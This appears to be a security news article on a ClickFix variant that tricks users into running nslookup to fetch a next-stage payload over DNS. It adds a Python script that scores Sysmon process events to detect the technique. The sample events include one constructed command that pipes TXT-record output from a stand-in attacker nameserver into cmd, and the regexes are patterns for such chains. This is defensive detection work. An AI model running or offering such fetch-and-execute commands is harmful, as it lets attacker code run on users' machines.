Microsoft has disclosed details of a new version of the ClickFix social engineering tactic in which the attackers trick unsuspecting users into running commands that carry out a Domain Name System (DNS) lookup to retrieve the next-stage payload. Specifically, the attack relies on using the “nslookup” (short for nameserver lookup) command to execute a custom DNS lookup triggered via the Windows
Microsoft said this new variation of ClickFix uses DNS as a “lightweight staging or signaling channel,” enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload…
Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic…
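Because nslookup is a legitimate administrative tool, the useful detection signal is not the binary itself but the surrounding chain: a command interpreter launched from explorer.exe (the Run dialog the victim pastes into) whose command line calls nslookup, selects a non-address record type or names its own resolver, and pipes the answer into execution. The script below is an added example, not Microsoft's detection logic or code from the report. It scores Windows process-creation records with Sysmon Event ID 1 style fields and folds each nslookup child into its parent interpreter. The sample events, GUIDs, paths and .example domains are constructed, and the weights and threshold are assumptions to tune against your own baseline.

```python
"""Added example: triage Windows process-creation events for ClickFix-style
nslookup staging. Not Microsoft's detection logic; weights are assumptions."""
from __future__ import annotations
import re

# Interpreters a pasted ClickFix command typically runs under (assumed list).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Constructs that feed nslookup output into execution: pipe, &&, for /f, iex.
CHAIN = re.compile(r"\|\s*\S|&&|\bfor\s+/f\b|\biex\b|invoke-expression", re.I)
# Record-type selection; TXT is the usual carrier for arbitrary staged data.
QTYPE = re.compile(r"-(?:querytype|query|type|q)=(\w+)", re.I)
# "nslookup [-opts] name server": a positional resolver argument means the
# query goes to a server the attacker chose, not the host's configured DNS.
EXPLICIT_SERVER = re.compile(
    r'^\s*"?(?:.*\\)?nslookup(?:\.exe)?"?\s+(?:-\S+\s+)*\S+\s+\S+\s*$', re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one Sysmon EID 1-style record; higher means more ClickFix-like."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    cmdline = ev["CommandLine"]
    score, reasons = 0, []
    if image in INTERPRETERS and "nslookup" in cmdline.lower():
        score += 2; reasons.append("interpreter command line invokes nslookup")
        if parent == "explorer.exe":          # Run dialog or shell context
            score += 3; reasons.append("interpreter launched from explorer.exe")
        if CHAIN.search(cmdline):
            score += 3; reasons.append("nslookup output chained into execution")
    if image == "nslookup.exe":
        m = QTYPE.search(cmdline)
        if m and m.group(1).lower() not in {"a", "aaaa", "ptr"}:
            score += 2; reasons.append(f"non-address record type {m.group(1).upper()}")
        if EXPLICIT_SERVER.match(cmdline):
            score += 2; reasons.append("explicit resolver bypasses configured DNS")
        if parent in INTERPRETERS:
            score += 1; reasons.append("spawned by a command interpreter")
    return score, reasons


def triage(events: list[dict], threshold: int = 5) -> list[dict]:
    """Fold each nslookup child into its parent interpreter and report parents
    (or orphan nslookups) whose combined score reaches the threshold."""
    scored = {ev["ProcessGuid"]: (ev, *score_event(ev)) for ev in events}
    findings = []
    for guid, (ev, score, reasons) in scored.items():
        if _basename(ev["Image"]) == "nslookup.exe" and ev["ParentProcessGuid"] in scored:
            continue  # reported through its parent below
        total, why = score, list(reasons)
        for cev, cscore, creasons in scored.values():
            if cev["ParentProcessGuid"] == guid and _basename(cev["Image"]) == "nslookup.exe":
                total += cscore
                why += [f"child nslookup: {r}" for r in creasons]
        if total >= threshold:
            findings.append({"ProcessGuid": guid, "Image": _basename(ev["Image"]),
                             "score": total, "reasons": why})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed sample events (GUIDs, paths and .example domains are made up).
SAMPLE_EVENTS = [
    {"ProcessGuid": "{E1}", "ParentProcessGuid": "{EXPLORER}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd.exe /c "nslookup -type=txt verify-7f3a.update-check.example '
                    'ns1.update-check.example | cmd"'},
    {"ProcessGuid": "{E2}", "ParentProcessGuid": "{E1}",
     "Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup -type=txt verify-7f3a.update-check.example ns1.update-check.example"},
    {"ProcessGuid": "{E3}", "ParentProcessGuid": "{E1}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd"},
    # Benign: an admin opened a console and resolved an internal host.
    {"ProcessGuid": "{E4}", "ParentProcessGuid": "{EXPLORER}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe"'},
    {"ProcessGuid": "{E5}", "ParentProcessGuid": "{E4}",
     "Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup mail.corp.example"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["score"], f["Image"], f["ProcessGuid"])
        for r in f["reasons"]:
            print("   -", r)
```

On the constructed sample, only the explorer-spawned cmd.exe with the piped nslookup reaches the threshold; the administrator's plain `nslookup mail.corp.example` scores a single point and is not reported. Sysmon Event ID 22 (DNS query) records from the same host can be joined on ProcessGuid to confirm which names nslookup.exe actually resolved.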
The payload retrieved this way then kicks off an attack chain that fetches a ZIP archive from an external server…